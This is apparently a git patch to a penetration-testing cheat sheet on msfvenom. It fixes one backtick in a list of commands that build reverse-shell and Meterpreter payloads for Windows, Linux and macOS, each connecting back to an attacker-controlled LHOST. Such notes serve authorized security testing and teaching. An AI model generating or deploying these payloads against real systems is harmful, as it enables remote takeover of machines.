From 6324f5f57473aa5a580b3a44fc0c8d2f69951a6c Mon Sep 17 00:00:00 2001 From: Omar Santos Date: Tue, 7 Jan 2020 13:49:25 -0500 Subject: [PATCH] Update msfvenom.md --- post_exploitation/msfvenom.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/post_exploitation/msfvenom.md b/post_exploitation/msfvenom.md index 4cfe7e6..0d8f585 100644 --- a/post_exploitation/msfvenom.md +++ b/post_exploitation/msfvenom.md @@ -7,7 +7,7 @@ MsfVenom is a Metasploit standalone payload generator as a replacement for msfpa - Creates a simple TCP Payload for Windows - `msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe` - Creates a simple HTTP Payload for Windows -- `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf +- `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf` - Creates a simple TCP Shell for Linux - `msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho` - Creates a simple TCP Shell for Mac